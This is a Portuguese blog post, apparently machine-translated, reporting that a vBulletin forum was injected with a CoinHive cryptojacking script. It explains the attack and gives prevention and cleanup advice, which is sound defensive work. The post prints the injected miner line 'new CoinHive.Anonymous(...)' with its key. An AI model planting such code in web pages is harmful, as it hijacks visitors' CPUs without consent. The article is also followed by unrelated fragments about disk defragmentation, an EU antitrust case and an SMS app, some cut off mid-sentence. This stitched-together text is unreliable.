Injecting crypto-mining script on local network
Índice:
Eu tenho lido sobre proprietários de sites usando scripts em seus sites que usam a CPU do computador do visitante quando visitam o site. A idéia é gerar receita com seu conteúdo - e, assim, em vez de usar anúncios, eles usam um script que é executado no navegador e usam os recursos do computador do usuário para minar a criptomoeda. Mas eu costumava pensar que apenas os proprietários de sites faziam isso por design - eu nunca imaginei que os hackers hackassem sites, enviassem o script para outros sites e usassem sua CPU de visitantes para ganhar dinheiro para si mesmos. Mas isso é o que parece estar acontecendo agora!
Cointive crypto-mining script
Ontem, quando visitei nosso TWC Forum, que roda no software vBulletin, meu software de segurança emitiu este aviso:
// coinhive dot com /lib/coinhive.js Arquivo de objeto detectado, download bloqueado
Eu costumo visitar o fórum todos os dias e não o tinha visto no dia anterior. Então eu suponho que isso tenha acontecido durante a noite, quando eu estava dormindo.
Eu uso o software vBulletin para o fórum, e ele foi atualizado para a versão mais recente. Além disso, isso foi bastante surpreendente para nós, pois o domínio TheWindowsClub.com usa o Sucuri Web Antivirus & Firewall para se proteger contra ameaças e ataques online da Web.
Meu software de segurança para PC impediu que o script malicioso fosse executado no meu computador com Windows 10. Eu verifiquei com outros navegadores como o Chrome & Edge, e os resultados foram os mesmos.
Após clicar com o botão direito do mouse na página do fórum e verificar o código fonte, descobri que era um script malicioso do CryptoMiner do CoinHive.
Este é o Javascript Coinhive malicioso que entrou no meu código de fórum:
var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
De qualquer forma, a primeira coisa que fiz foi fórum abaixo e informe a Sucuri.
O pessoal da Sucuri limpou o fórum do script Coinhive que foi enviado para o meu fórum em poucas horas, e tudo foi bom.
O que é o CoinHive
Coinhive oferece um mineiro JavaScript para a criptomoeda do Monero que você pode incorporar em seu site e usar a CPU de computadores de visitantes do site para coletar moedas para você.
Isso é chamado Cryptojacking . Envolve seqüestro de navegadores dos usuários para mineração criptomoeda. Alguns proprietários de sites podem usá-lo para ganhar dinheiro - mas, no nosso caso, ele foi injetado.
Quando um usuário acessa o site infectado, o Coinhive JavaScript executa e explora o Monero utilizando os recursos da CPU do usuário. Isso pode levar à aceleração da CPU e à falha inesperada do sistema da máquina da vítima.
Agora, se o seu navegador estiver infectado, você verá a utilização do seu recurso aumentar. Feche o navegador e ele será descartado. O usuário pode notar sua máquina esquentando, a ventoinha funcionando rápido ou a bateria descarregando rapidamente.
Eu pedi ao meu colega Saurabh Mukhekar para visitar meu fórum usando seu Mac e ver o que aconteceu. Bem, seu computador Mac foi afetado também quando ele abriu o fórum com o Safari! Ele é um daqueles usuários inteligentes do Mac OSX que usa um software antivírus para seu Mac. Seu antivírus Avast para Mac impediu que o script mal-intencionado fosse executado.
Saurabh,
O malware CoinHive não apenas seqüestra um PC Windows, mas também o Mac, já que é uma infecção Javascript baseada em navegador. É bom eu não acreditar no mito de que os Macs não precisam de um software antivírus, senão minha máquina teria sido infectada e meu Mac teria continuado a produzir moedas para outra pessoa.
Impeça o CoinHive de infectar seu site
- Não use nenhum modelo ou plug-in NULL em seu site / fórum.
- Mantenha seu CMS atualizado para a versão mais recente.
- Atualize seu software de hospedagem regularmente (PHP, banco de dados, etc…).
- Proteja seu site com provedores de segurança da Web como Sucuri, Cloudflare, Wordfence, etc.
- Tome as precauções básicas para proteger seu blog.
Remoção do CoinHive miner do site
Primeiro de tudo, você precisa ser o webmaster do site. site infectado - ou ter credenciais administrativas que lhe dão acesso a todos os arquivos do site.
Agora, quando o antivírus detectar a infecção do CoinHive, clique com o botão direito do mouse na página da Web e selecione View Source Code. Em seguida, pressione Ctrl + F e procure por “CoinHive”.
Depois de identificar a localização do código malicioso, você precisa ver a sua posição - onde ele está localizado. Agora você precisa removê-lo manualmente. Para fazer isso, você precisa de um pouco de conhecimento de codificação de sua plataforma. Você terá que localizar o arquivo infectado (s) e remover manualmente o script acima dele. Se você não tem certeza, peça a um especialista para fazer isso. Como usamos a Sucuri, deixamos que eles façam isso.
Feito isso, limpe o cache do servidor e do navegador. Se você estiver usando qualquer plugin de cache ou dizer MaxCDN, limpe esses caches também
Proteja-se contra scripts de mineração de criptografia
A tecnologia Cryptocurrencies & Blockchain está dominando o mundo. Está criando um impacto na economia global e causando interrupções tecnológicas também. Todos começaram a se concentrar em um mercado tão lucrativo - e isso inclui hackers de sites também. À medida que os retornos aumentam, devemos esperar que essas tecnologias sejam mal utilizadas. Esse é o lado obscuro de qualquer tecnologia emergente.
O que podemos fazer é tomar as melhores precauções possíveis em todos os momentos. Além de usar um bom software de segurança, use uma extensão do Chrome ou Firefox que bloqueie sites de usar sua CPU para minerar Cryptocurrency - ou, melhor ainda, usar o Anti-WebMiner que interromperá os ataques do Cryptojacking Mining Script modificando seu arquivo Hosts. Funciona em todos os navegadores. Se você é um usuário de Mac, por favor, adquira também um software antivírus para o seu computador.
Por precaução, se você sentir que visitou um site infectado, seria uma boa idéia limpar o seu navegador. faça o cache e escaneie sua máquina com seu software antivírus e com o AdwCleaner.
Fique seguro, fique alerta!
O Smart Defrag mantém seu computador funcionando - Ajude seu PC a funcionar em níveis ótimos desfragmentando seu disco rígido.
Uma das maneiras mais simples de garantir que o seu PC funcione da maneira mais eficiente possível é desfragmentar o disco rígido, e o Smart Defrag é uma ótima maneira de fazê-lo. Tal como acontece com o utilitário de desfragmentação incorporado no Windows, este brinde analisa o seu disco rígido, mostra os resultados e, em seguida, permite-lhe decidir se deseja desfragmentar. Mas também oferece extras, como vários níveis de desfragmentação, incluindo simplesmente desfragmentar o disco rígido ou
Da EC levar adiante processo antimonopólio Apesar da decisão da Microsoft sobre a Microsoft rejeitar o caso antitruste contra a Microsoft apesar da decisão de tirar o IE do Windows 7 na Europa A Comissão Européia prosseguirá com seu processo antitruste contra a Microsoft, independentemente do anúncio na quinta-feira de que a gigante do software está retirando seu navegador, o Internet Explorer (IE), da próxima encarnação de seu sistema operacional, o Windows 7, na Europa. A Comissão acusou a Mic
"No nível de ambos fabricantes de computadores e vendas a retalho, a comunicação de objecções da Comissão (SO) sugere que os consumidores devem ter uma escolha genuína de browsers. Dado que mais de 95 por cento dos consumidores adquirem o Windows pré-instalado em um PC, é particularmente importante garantir a escolha do consumidor através do canal do fabricante do computador ", disse o comunicado. Eliminar o IE do Windows" pode ser positivo " Segundo o comunicado, isso permitiria aos fabricantes
Depois de instalar o aplicativo no seu telefone Android, registre sua Conta do Google e depois vá para o seu PC. Do seu navegador, MobiTexter pede acesso à sua conta do Google, incluindo seus contatos. Depois que você concede a permissão, o site vincula você às principais ferramentas de mensagens de texto.
A interface da Web do MobiTexter é básica, mas pode ser reparada. Ele puxa automaticamente suas conversas de mensagem de texto mais recentes, que são exibidas em uma lista no lado esquerdo da página. À direita, você tem campos para inserir novos textos individuais ou em grupo.